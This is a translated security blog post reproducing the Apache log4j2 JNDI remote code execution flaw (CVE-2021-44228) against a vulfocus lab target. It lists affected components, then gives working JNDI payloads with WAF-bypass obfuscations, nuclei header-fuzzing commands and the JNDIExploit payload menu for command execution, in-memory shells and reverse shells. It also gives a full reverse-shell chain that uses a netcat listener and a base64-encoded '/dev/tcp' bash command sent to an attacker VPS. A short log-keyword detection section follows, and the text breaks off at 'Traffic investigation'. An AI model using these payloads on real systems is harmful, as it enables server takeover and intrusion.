Apache log4j2 Remote Command Execution Vulnerability Reproduction

2022-11-02 15:02:52

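Preface

When the Apache log4j2 RCE vulnerability (CVE-2021-44228) came out, well-known vendors across many industries were hit one after another. It is more serious than the earlier fastjson and shiro vulnerabilities, and it is expected to persist for the next three to four years. The vulnerability has an extremely wide impact, a low barrier to exploitation and very high severity; if exploited maliciously, the damage would be no less than that of the "EternalBlue" vulnerability that broke out in 2017.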

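0x01 Vulnerability Overview

Apache Log4j2 is a Java-based logging tool. It is a rewrite of the Log4j framework and introduces a large number of rich features. The framework is widely used in business system development to record log information. Because the Log4j2 component has a JNDI injection flaw in how it handles log messages, an unauthorized attacker can send carefully crafted malicious data to the target server, trigger the parsing flaw in Log4j2, execute arbitrary code on the target server and obtain control of it.

  • CVE ID: CVE-2021-44228
  • Severity: Critical
  • CVSS score: 10 (the maximum)
  • Affected versions: Apache log4j2 2.0 - 2.14.1
  • Safe version: Apache log4j-2.15.0-rc2

For a more detailed analysis of this vulnerability, see: Log4j High-Risk Vulnerability! The Specific Cause Explained! First on the Web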

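0x02 Scope of Impact

The vulnerability has an extremely wide impact and very high severity, mainly because the component is so widely used: every product that uses it is affected, so the software supply chain risk it creates downstream is enormous. Applications and components currently known to be possibly affected include, but are not limited to, the following:

Component name

Version information

Apache Struts2

All versions

ElasticSearch

5.x, 6.x, 7.x, 8.0.0beta1, 8.0.0alpha1 and 8.0.0alpha2

Logstash

5.0.0 to latest

Apache Flink

1.11.0-rc1 to 1.14.0

Apache Druid

0.7.x and above

Hadoop Hive

2.x and 3.x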

Apache Log4j SLF4J Binding

‘2.14.1’, ‘2.14.0’, ‘2.13.3’, ‘2.13.2’, ‘2.13.1’, ‘2.13.0’, ‘2.12.1’, ‘2.12.0’, ‘2.11.2’, ‘2.11.1’, ‘2.11.0’, ‘2.10.0’, ‘2.9.1’, ‘2.9.0’, ‘2.8.2’, ‘2.8.1’, ‘2.8’, ‘2.7’, ‘2.6.2’, ‘2.6.1’, ‘2.6’, ‘2.5’, ‘2.4.1’, ‘2.4’, ‘2.3’, ‘2.2’, ‘2.1’, ‘2.0.2’, ‘2.0.1’, ‘2.0’, ‘2.0-rc2’, ‘2.0-rc1’, ‘2.0-beta9’, ‘2.0-beta8’, ‘2.0-beta7’, ‘2.0-beta6’, ‘2.0-beta5’

Spring Boot

‘2.6.1’, ‘2.6.0’, ‘2.5.7’, ‘2.5.6’, ‘2.5.5’, ‘2.5.4’, ‘2.5.3’, ‘2.5.2’, ‘2.5.1’, ‘2.5.0’, ‘2.4.13’, ‘2.4.12’, ‘2.4.11’, ‘2.4.10’, ‘2.4.9’, ‘2.4.8’, ‘2.4.7’, ‘2.4.6’, ‘2.4.5’, ‘2.4.4’, ‘2.4.3’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.12.RELEASE’, ‘2.3.11.RELEASE’, ‘2.3.10.RELEASE’, ‘2.3.9.RELEASE’, ‘2.3.8.RELEASE’, ‘2.3.7.RELEASE’, ‘2.3.6.RELEASE’, ‘2.3.5.RELEASE’, ‘2.3.4.RELEASE’, ‘2.3.3.RELEASE’, ‘2.3.2.RELEASE’, ‘2.3.1.RELEASE’, ‘2.3.0.RELEASE’, ‘2.2.13.RELEASE’, ‘2.2.12.RELEASE’, ‘2.2.11.RELEASE’, ‘2.2.10.RELEASE’, ‘2.2.9.RELEASE’, ‘2.2.8.RELEASE’, ‘2.2.7.RELEASE’, ‘2.2.6.RELEASE’, ‘2.2.5.RELEASE’, ‘2.2.4.RELEASE’, ‘2.2.3.RELEASE’, ‘2.2.2.RELEASE’, ‘2.2.1.RELEASE’, ‘2.2.0.RELEASE’, ‘2.1.18.RELEASE’, ‘2.1.17.RELEASE’, ‘2.1.16.RELEASE’, ‘2.1.15.RELEASE’, ‘2.1.14.RELEASE’, ‘2.1.13.RELEASE’, ‘2.1.12.RELEASE’, ‘2.1.11.RELEASE’, ‘2.1.10.RELEASE’, ‘2.1.9.RELEASE’, ‘2.1.8.RELEASE’, ‘2.1.7.RELEASE’, ‘2.1.6.RELEASE’, ‘2.1.5.RELEASE’, ‘2.1.4.RELEASE’, ‘2.1.3.RELEASE’, ‘2.1.2.RELEASE’, ‘2.1.1.RELEASE’, ‘2.1.0.RELEASE’, ‘2.0.9.RELEASE’, ‘2.0.8.RELEASE’, ‘2.0.7.RELEASE’, ‘2.0.6.RELEASE’, ‘2.0.5.RELEASE’, ‘2.0.4.RELEASE’, ‘2.0.3.RELEASE’, ‘2.0.2.RELEASE’, ‘2.0.1.RELEASE’, ‘2.0.0.RELEASE’, ‘1.5.22.RELEASE’, ‘1.5.21.RELEASE’, ‘1.5.20.RELEASE’, ‘1.5.19.RELEASE’, ‘1.5.18.RELEASE’, ‘1.5.17.RELEASE’, ‘1.5.16.RELEASE’, ‘1.5.15.RELEASE’, ‘1.5.14.RELEASE’, ‘1.5.13.RELEASE’, ‘1.5.12.RELEASE’, ‘1.5.11.RELEASE’, ‘1.5.10.RELEASE’, ‘1.5.9.RELEASE’, ‘1.5.8.RELEASE’, ‘1.5.7.RELEASE’, ‘1.5.6.RELEASE’, ‘1.5.5.RELEASE’, ‘1.5.4.RELEASE’, ‘1.5.3.RELEASE’, ‘1.5.2.RELEASE’, ‘1.5.1.RELEASE’, ‘1.5.0.RELEASE’, ‘1.4.7.RELEASE’, ‘1.4.6.RELEASE’, ‘1.4.5.RELEASE’, ‘1.4.4.RELEASE’, ‘1.4.3.RELEASE’, ‘1.4.2.RELEASE’, ‘1.4.1.RELEASE’, ‘1.4.0.RELEASE’, ‘1.3.8.RELEASE’, ‘1.3.7.RELEASE’, ‘1.3.6.RELEASE’, ‘1.3.5.RELEASE’, ‘1.3.4.RELEASE’, ‘1.3.3.RELEASE’, ‘1.3.2.RELEASE’, ‘1.3.1.RELEASE’, ‘1.3.0.RELEASE’, ‘1.2.8.RELEASE’, ‘1.2.7.RELEASE’, ‘1.2.6.RELEASE’, ‘1.2.5.RELEASE’, ‘1.2.4.RELEASE’, ‘1.2.3.RELEASE’, ‘1.2.2.RELEASE’, 
‘1.2.1.RELEASE’, ‘1.2.0.RELEASE’, ‘1.1.12.RELEASE’, ‘1.1.11.RELEASE’, ‘1.1.10.RELEASE’, ‘1.1.9.RELEASE’, ‘1.1.8.RELEASE’, ‘1.1.7.RELEASE’, ‘1.1.6.RELEASE’, ‘1.1.5.RELEASE’, ‘1.1.4.RELEASE’, ‘1.1.3.RELEASE’, ‘1.1.2.RELEASE’, ‘1.1.1.RELEASE’, ‘1.1.0.RELEASE’, ‘1.0.2.RELEASE’, ‘1.0.1.RELEASE’, ‘1.0.0.RELEASE’

Camel :: Core

‘3.13.0’, ‘3.12.0’, ‘3.11.4’, ‘3.11.3’, ‘3.11.2’, ‘3.11.1’, ‘3.11.0’, ‘3.10.0’, ‘3.9.0’, ‘3.8.0’, ‘3.7.6’, ‘3.7.5’, ‘3.7.4’, ‘3.7.3’, ‘3.7.2’, ‘3.7.1’, ‘3.7.0’, ‘3.6.0’, ‘3.5.0’, ‘3.4.6’, ‘3.4.5’, ‘3.4.4’, ‘3.4.3’, ‘3.4.2’, ‘3.4.1’, ‘3.4.0’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.1’, ‘3.0.0’, ‘2.25.4’, ‘2.25.3’, ‘2.25.2’, ‘2.25.1’, ‘2.25.0’, ‘2.24.3’, ‘2.24.2’, ‘2.24.1’, ‘2.24.0’, ‘2.23.4’, ‘2.23.3’, ‘2.23.2’, ‘2.23.1’, ‘2.23.0’, ‘2.22.5’, ‘2.22.4’, ‘2.22.3’, ‘2.22.2’, ‘2.22.1’, ‘2.22.0’, ‘2.21.5’, ‘2.21.4’, ‘2.21.3’, ‘2.21.2’, ‘2.21.1’, ‘2.21.0’, ‘2.20.4’, ‘2.20.3’, ‘2.20.2’, ‘2.20.1’, ‘2.20.0’, ‘2.19.5’, ‘2.19.4’, ‘2.19.3’, ‘2.19.2’, ‘2.19.1’, ‘2.19.0’, ‘2.18.5’, ‘2.18.4’, ‘2.18.3’, ‘2.18.2’, ‘2.18.1’, ‘2.18.0’, ‘2.17.7’, ‘2.17.6’, ‘2.17.5’, ‘2.17.4’, ‘2.17.3’, ‘2.17.2’, ‘2.17.1’, ‘2.17.0’, ‘2.16.5’, ‘2.16.4’, ‘2.16.3’, ‘2.16.2’, ‘2.16.1’, ‘2.16.0’, ‘2.15.6’, ‘2.15.5’, ‘2.15.4’, ‘2.15.3’, ‘2.15.2’, ‘2.15.1’, ‘2.15.0’, ‘2.14.4’, ‘2.14.3’, ‘2.14.2’, ‘2.14.1’, ‘2.14.0’, ‘2.13.4’, ‘2.13.3’, ‘2.13.2’, ‘2.13.1’, ‘2.13.0’, ‘2.12.5’, ‘2.12.4’, ‘2.12.3’, ‘2.12.2’, ‘2.12.1’, ‘2.12.0’, ‘2.11.4’, ‘2.11.3’, ‘2.11.2’, ‘2.11.1’, ‘2.11.0’, ‘2.10.7’, ‘2.10.6’, ‘2.10.5’, ‘2.10.4’, ‘2.10.3’, ‘2.10.2’, ‘2.10.1’, ‘2.10.0’, ‘2.9.8’, ‘2.9.7’, ‘2.9.6’, ‘2.9.5’, ‘2.9.4’, ‘2.9.3’, ‘2.9.2’, ‘2.9.1’, ‘2.9.0’, ‘2.8.6’, ‘2.8.5’, ‘2.8.4’, ‘2.8.3’, ‘2.8.2’, ‘2.8.1’, ‘2.8.0’, ‘2.7.5’, ‘2.7.4’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.0’, ‘2.5.0’, ‘2.4.0’, ‘2.3.0’, ‘2.2.0’, ‘2.1.0’, ‘2.0.0’, ‘1.6.4’, ‘1.6.3’, ‘1.6.2’, ‘1.6.1’, ‘1.6.0’, ‘1.5.0’, ‘1.4.0’, ‘1.3.0’, ‘1.2.0’, ‘1.1.0’, ‘1.0.0’, ‘3.0.0-M4’, ‘3.0.0-M3’, ‘3.0.0-M2’, ‘3.0.0-M1’, ‘2.0-M3’, ‘2.0-M2’, ‘2.0-M1’, ‘3.0.0-RC3’, ‘3.0.0-RC2’, ‘3.0.0-RC1’, ‘2.9.0-RC1’

JUnit Vintage Engine

‘5.8.2’, ‘5.8.1’, ‘5.8.0’, ‘5.7.2’, ‘5.7.1’, ‘5.7.0’, ‘5.6.3’, ‘5.6.2’, ‘5.6.1’, ‘5.6.0’, ‘5.5.2’, ‘5.5.1’, ‘5.5.0’, ‘5.4.2’, ‘5.4.1’, ‘5.4.0’, ‘5.3.2’, ‘5.3.1’, ‘5.3.0’, ‘5.2.0’, ‘5.1.1’, ‘5.1.0’, ‘4.12.3’, ‘4.12.2’, ‘4.12.1’, ‘4.12.0’, ‘5.8.0-M1’, ‘5.7.0-M1’, ‘5.6.0-M1’, ‘5.5.0-M1’, ‘5.4.0-M1’, ‘5.3.0-M1’, ‘5.2.0-M1’, ‘5.1.0-M2’, ‘5.1.0-M1’, ‘4.12.0-M6’, ‘4.12.0-M5’, ‘4.12.0-M4’, ‘4.12.0-M3’, ‘4.12.0-M2’, ‘4.12.0-M1’, ‘5.8.0-RC1’, ‘5.7.0-RC1’, ‘5.6.0-RC1’, ‘5.5.0-RC2’, ‘5.5.0-RC1’, ‘5.4.0-RC2’, ‘5.4.0-RC1’, ‘5.3.0-RC1’, ‘5.2.0-RC1’, ‘5.1.0-RC1’, ‘4.12.0-RC3’, ‘4.12.0-RC2’, ‘4.12.0-RC1’

JBoss Logging 3

‘3.4.2.Final’, ‘3.4.1.Final’, ‘3.4.0.Final’, ‘3.3.3.Final’, ‘3.3.2.Final’, ‘3.3.1.Final’, ‘3.3.0.Final’, ‘3.2.1.Final’, ‘3.2.0.Final’, ‘3.1.0.CR2’, ‘3.1.0.CR1’, ‘3.0.0.CR1’, ‘3.3.0.Beta1’, ‘3.2.0.Beta1’, ‘3.1.0.Beta3’, ‘3.1.0.Beta2’, ‘3.1.0.Beta1’, ‘3.0.0.Beta5’, ‘3.0.0.Beta4’, ‘3.0.0.Beta3’, ‘3.0.0.Beta2’, ‘3.0.0.Beta1’

HikariCP

‘5.0.0’, ‘4.0.3’, ‘4.0.2’, ‘4.0.1’, ‘4.0.0’, ‘3.4.5’, ‘3.4.4’, ‘3.4.3’, ‘3.4.2’, ‘3.4.1’, ‘3.4.0’, ‘3.3.1’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.0’, ‘2.7.9’, ‘2.7.8’, ‘2.7.7’, ‘2.7.6’, ‘2.7.5’, ‘2.7.4’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.3’, ‘2.6.2’, ‘2.6.1’, ‘2.6.0’, ‘2.5.1’, ‘2.5.0’, ‘2.4.7’, ‘2.4.6’, ‘2.4.5’, ‘2.4.4’, ‘2.4.3’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.13’, ‘2.3.12’, ‘2.3.11’, ‘2.3.10’, ‘2.3.9’, ‘2.3.8’, ‘2.3.7’, ‘2.3.6’, ‘2.3.5’, ‘2.3.4’, ‘2.3.3’, ‘2.3.2’, ‘2.3.1’, ‘2.3.0’, ‘2.2.5’, ‘2.2.4’, ‘2.2.3’, ‘2.2.2’, ‘2.2.1’, ‘2.2.0’, ‘2.1.0’, ‘2.0.1’, ‘2.0.0’, ‘1.4.0’, ‘1.3.9’, ‘1.3.8’, ‘1.3.7’, ‘1.3.6’, ‘1.3.5’, ‘1.3.4’, ‘1.3.3’, ‘1.3.2’, ‘1.3.1’, ‘1.3.0’, ‘1.2.9’, ‘1.2.8’, ‘1.2.7’, ‘1.2.6’, ‘1.2.5’, ‘1.2.4’, ‘1.2.3’, ‘1.2.2’, ‘1.2.1’, ‘1.1.9’, ‘1.1.8’, ‘1.1.7’, ‘1.1.6’, ‘1.1.5’, ‘1.1.4’, ‘1.1.3’

Logging

‘1.1.0’, ‘1.0.0’, ‘0.6.0’, ‘0.5.0’, ‘0.4.1’, ‘0.4.0’, ‘0.3.1’, ‘0.3.0’, ‘0.2.6’, ‘0.2.4’, ‘0.2.3’, ‘0.2.2’, ‘0.2.0’, ‘0.1.2’, ‘0.1.1’, ‘0.1.0’, ‘0.5.0-alpha.1’, ‘0.5.0-alpha’

Jedis

‘3.7.0’, ‘3.6.3’, ‘3.6.2’, ‘3.6.1’, ‘3.6.0’, ‘3.5.2’, ‘3.5.1’, ‘3.5.0’, ‘3.4.1’, ‘3.4.0’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.1’, ‘3.0.0’, ‘2.10.2’, ‘2.10.1’, ‘2.10.0’, ‘2.9.3’, ‘2.9.2’, ‘2.9.1’, ‘2.9.0’, ‘2.8.2’, ‘2.8.1’, ‘2.8.0’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.3’, ‘2.6.2’, ‘2.6.1’, ‘2.6.0’, ‘2.5.2’, ‘2.5.1’, ‘2.5.0’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.1’, ‘2.3.0’, ‘2.2.1’, ‘2.2.0’, ‘2.1.0’, ‘2.0.0’, ‘1.5.2’, ‘1.5.1’, ‘1.5.0’, ‘1.4.0’, ‘1.3.1’, ‘1.3.0’, ‘jedis-3.6.2’, ‘3.1.0-m4’, ‘3.1.0-m3’, ‘3.1.0-m2’, ‘3.1.0-m1’, ‘3.0.0-m1’, ‘2.10.0-m1’, ‘3.7.0-RC1’, ‘3.6.0-RC1’, ‘3.1.0-rc2’, ‘3.1.0-rc’, ‘3.0.1-rc1’, ‘3.0.0-rc1’, ‘2.10.0-rc1’, ‘1.5.0-RC2’, ‘1.5.0-RC1’, ‘4.0.0-beta4’, ‘4.0.0-beta3’, ‘4.0.0-beta2’, ‘4.0.0-beta1’

WSO2 Carbon Kernel Core

‘5.2.13’, ‘5.2.8’, ‘5.2.7’, ‘5.2.6’, ‘5.2.5’, ‘5.2.4’, ‘5.2.3’, ‘5.2.2’, ‘5.2.1’, ‘4.6.2’, ‘4.6.1’, ‘4.6.0’, ‘4.5.1’, ‘4.4.37’, ‘4.4.36’, ‘4.4.35’, ‘4.4.34’, ‘4.4.33’, ‘4.4.32’, ‘4.4.31’, ‘4.4.30’, ‘4.4.29’, ‘4.4.28’, ‘4.4.27’, ‘4.4.26’, ‘4.4.25’, ‘4.4.24’, ‘4.4.23’, ‘4.4.22’, ‘4.4.21’, ‘4.4.20’, ‘4.4.19’, ‘4.7.0-m6’, ‘4.7.0-m5’, ‘4.7.0-m4’, ‘4.7.0-m3’, ‘4.7.0-m2’, ‘4.7.0-m1’, ‘4.6.3-m5’, ‘4.6.3-m4’, ‘4.6.3-m3’, ‘4.6.3-m2’, ‘4.6.3-m1’, ‘4.6.2-m9’, ‘4.6.2-m8’, ‘4.6.2-m7’, ‘4.6.2-m6’, ‘4.6.2-m5’, ‘4.6.2-m4’, ‘4.6.2-m3’, ‘4.6.2-m2’, ‘4.6.2-m1’, ‘4.6.1-m8’, ‘4.6.1-m7’, ‘4.6.1-m6’, ‘4.6.1-m5’, ‘4.6.1-m4’, ‘4.6.1-m3’, ‘4.6.1-m2’, ‘4.6.1-m1’, ‘4.6.1-beta2’, ‘4.6.1-beta’, ‘4.6.0-beta2’, ‘4.6.1-alpha3’, ‘4.6.1-alpha2’, ‘4.6.1-alpha’, ‘4.6.0-alpha2’, ‘4.6.0-alpha’

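The affected-version statistics above for these applications/components come from: 微步情报局 (ThreatBook Intelligence), 微步在线研究响应中心 (ThreatBook Research and Response Center)

0x03 Demo Environment

The demo uses the log4j2-rce lab on the vulfocus online platform; the vulnerable location in that lab is the /hello path.

The request packet for the vulfocus log4j2-rce lab is as follows: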

POST /hello HTTP/1.1
Host: vulfocus.fofa.so:30861
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

payload=xxxxxx

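Verification uses dnslog, burpsuite, JNDIExploit and a VPS server with a public IP; for the Java runtime, a version below jdk8u191 is recommended for the reproduction.

  • dnslog: http://www.dnslog.cn/
  • JNDIExploit: https://github.com/feihong-cs/JNDIExploit
  • jdk8: https://www.wmzhe.com/soft-70159.html

0x04 Vulnerability Detection

1. Manual verification with dnslog

First generate an address on the dnslog platform, then use that address to build a payload that makes the target machine send a request to the dnslog platform: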

POST /hello HTTP/1.1
Host: vulfocus.fofa.so:30861
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

payload=${jndi:ldap://03ibvw.dnslog.cn}

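After the request succeeds, click Refresh Record on the dnslog platform and it shows the request received from the target, recording the target's IP address and the response time.

The steps above confirm that the vulnerability really exists in the demo lab. In a real environment, however, they only support a preliminary judgment that the target is very likely vulnerable: because of the complicating factors in real environments, even a successful dnslog request does not fully guarantee that the target has the RCE vulnerability.

2. log4j2 Burp passive scanning

log4j2_burp_scan is a passive Burp RCE scanning tool for log4j2. It recognizes all GET, POST and cookie parameters; within the ceye.io API rate limit it scans every parameter with the maximum number of threads, and it records and filters out addresses that have already been checked.

  • 2021-12-11: added detection of request headers: HOST, User-agent, referer, Origin, AUTH, Forwarded-For-Ip, Forwarded-For, Forwarded, X-Client-IP, X-Rewrite-URL
  • Download: https://pan.baidu.com/s/1hXCPj9tlZTC3799h9sKQjA extraction code: 7b7v

Open log4j-1.1.py and set the API Token and Identifier values to those of your own ceye account; if you have no account, you can register one at ceye.io

Open BurpSuite->Extender->Options and configure the Jython and python2 module folders before loading the plugin, otherwise loading the plugin will fail

  • Jython: click to download, extraction code: h6br

Then open BurpSuite->Extender->Extensions and load the log4j2_burp_scan plugin

Enable the BurpSuite proxy in the browser and request the vulnerable lab again (be sure to include the test parameter); the vulnerability is then found by the passive scan

3. Fuzzing request headers for log4j

log4j-fuzz-head-poc fuzzes request headers in bulk for log4j and effectively detects security risks present in some headers; nuclei uses interactsh's dnslog by default

The following request header fields are supported: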

X-Client-IP
X-Remote-IP
X-Remote-Addr
X-Forwarded-For
X-Originating-IP
User-Agent
Referer
CF-Connecting_IP
True-Client-IP
X-Forwarded-For
Originating-IP
X-Real-IP
X-Client-IP
Forwarded
Client-IP
Contact
X-Wap-Profile
X-Api-Version

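The v2 version adds PoCs that bypass rc1; they also bypass blocking by common mainstream WAFs, and it includes a bypass for higher JDK versions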

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

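First, download and install the nuclei tool locally

https://github.com/projectdiscovery/nuclei

Then download log4j-fuzz-head-poc into the same directory as nuclei

https://github.com/test502git/log4j-fuzz-head-poc

Run the following commands to quickly fuzz request headers in bulk for log4j and detect the vulnerability

# Single target, rate limit 30
./nuclei -t log4j-fuzz-head-poc.yaml -u http://www.test.com -o res.txt -rl 30
# Batch of targets, rate limit 30
./nuclei -t log4j-fuzz-head-poc.yaml -l urls.txt -o res.txt -rl 30

Use the -p parameter to point at the BurpSuite proxy; the details of the request and response packets can then be seen in BurpSuite

Example:
./nuclei -t log4j-fuzz-head-poc-v2.yaml -u http://vulfocus.fofa.so:52197/ -o res.txt  -rl 30 -p http://127.0.0.1:8080

Parameter description:
-t template to run
-u target address to test
-o save results to a file
-rl rate limit
-p specify a proxy

You can also use the -debug parameter to see the details of the request and response packets directly in the terminal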

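0x05 Vulnerability Reproduction

1. JNDIExploit

JNDIExploit is a tool for exploiting JNDI injection. It draws heavily on and reuses code from the Rogue JNDI project, supports planting in-memory shells directly, integrates the common ways of bypassing higher JDK versions, and is suited to use together with automated tools.

  • Download: https://pan.baidu.com/s/1lmday3MHoPHI5f9rHNjV2Q extraction code: 5686

Use java -jar JNDIExploit.jar -u to list the supported LDAP formats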

Supported LADP Queries
* all words are case INSENSITIVE when send to ldap server

[ ] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
    ldap://127.0.0.1:1389/Basic/Command/[cmd]
    ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Basic/TomcatEcho
    ldap://127.0.0.1:1389/Basic/SpringEcho
    ldap://127.0.0.1:1389/Basic/WeblogicEcho
    ldap://127.0.0.1:1389/Basic/TomcatMemshell1
    ldap://127.0.0.1:1389/Basic/TomcatMemshell2  ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/Basic/JettyMemshell
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell1
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell2
    ldap://127.0.0.1:1389/Basic/JBossMemshell
    ldap://127.0.0.1:1389/Basic/WebsphereMemshell
    ldap://127.0.0.1:1389/Basic/SpringMemshell

[ ] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
    ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
    ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
    ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells

[ ] TomcatBypass Queries
    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
    ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2   ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell

[ ] GroovyBypass Queries
    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[ ] WebsphereBypass Queries
    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp

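All PayloadType values currently supported:

Dnslog: generates a DNS request, for use together with a DNSLog platform; simply adapted for Linux/Windows
Command: executes a command; if the command contains special characters, it can be Base64-encoded for transmission
ReverseShell: reverse shell for Linux systems, for convenience
TomcatEcho: echoes the command execution result when the middleware is Tomcat; the command to execute is passed by adding a custom header cmd: whoami
SpringEcho: echoes the command execution result when the framework is SpringMVC/SpringBoot; the command to execute is passed by adding a custom header cmd: whoami
WeblogicEcho: echoes the command execution result when the middleware is Weblogic; the command to execute is passed by adding a custom header cmd: whoami
TomcatMemshell1: plants a Tomcat in-memory shell; supports Behinder shell and Basic cmd shell
TomcatMemshell2: plants a Tomcat in-memory shell; supports Behinder shell and Basic cmd shell; requires the extra HTTP header Shell: true when used; this is the recommended method
SpringMemshell: plants a Spring in-memory shell; supports Behinder shell and Basic cmd shell
WeblogicMemshell1: plants a Weblogic in-memory shell; supports Behinder shell and Basic cmd shell
WeblogicMemshell2: plants a Weblogic in-memory shell; supports Behinder shell and Basic cmd shell; this is the recommended method
JettyMemshell: plants a Jetty in-memory shell; supports Behinder shell and Basic cmd shell
JBossMemshell: plants a JBoss in-memory shell; supports Behinder shell and Basic cmd shell
WebsphereMemshell: plants a Websphere in-memory shell; supports Behinder shell and Basic cmd shell

All GadgetType values currently supported: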

URLDNS
CommonsBeanutils1
CommonsBeanutils2
CommonsCollectionsK1
CommonsCollectionsK2
C3P0
Jdk7u21
Jre8u20
CVE_2020_2551
CVE_2020_2883

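The 3 actions in WebsphereBypass:

list: view directories or file contents on the target server via XXE
upload: upload a malicious jar to the target server's temporary directory via the XXE-based jar protocol
rce: load the jar already uploaded to the target server's temporary directory to achieve remote code execution (I could not reproduce this step locally; it throws java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed. If anyone has reproduced it successfully, please give me some pointers)

2. Deploying the LDAP service on a VPS

Upload JNDIExploit to the VPS server and run the following command

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx

Required parameters:
  * -i, --ip       # public IP of the VPS
Optional parameters:
    -l, --ldapPort # LDAP port (default: 1389)
    -p, --httpPort # HTTP port (default: 8080)

3. Command execution echo

JNDIExploit supports the following ways of echoing command output: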

ldap://127.0.0.1:1389/Basic/TomcatEcho
ldap://127.0.0.1:1389/Basic/SpringEcho
ldap://127.0.0.1:1389/Basic/WeblogicEcho

ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho

ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
ldap://127.0.0.1:1389/TomcatBypass/SpringEcho

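To use it, when sending an echo payload, add a cmd field with the command to execute to the request headers

Retrieving the flag from the target machine

4. Reverse shell from the host

First start a listener on a port on the VPS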

nc -lvvp 8888

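Build the payload by base64-encoding the command to execute (note that the "+" signs in the base64 output must be URL-encoded, and in burpsuite they must be double URL-encoded; otherwise each "+" is parsed as a space and the command fails to execute)

Original command: bash -i >& /dev/tcp/xx.xx.xx.xx/8888 0>&1
Base64-encoded: YmFzaCAtaSA+JiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA+JjE=
"+" double URL-encoded: YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA%2bJjE=
Final payload: ${jndi:ldap://xx.xx.xx.xx:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA%2bJjE=}

After the payload executes successfully, the VPS receives the reverse shell from the host

0x06 Intrusion Investigation

1. Log investigation

Before exploitation, attackers usually scan and probe using dnslog. For the common exploitation methods, investigate by searching the application's error logs for the following keywords.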

"javax.naming.CommunicationException"
"javax.naming.NamingException: problem generating object using object factory"
"Error looking up JNDI resource"

2. Traffic investigation

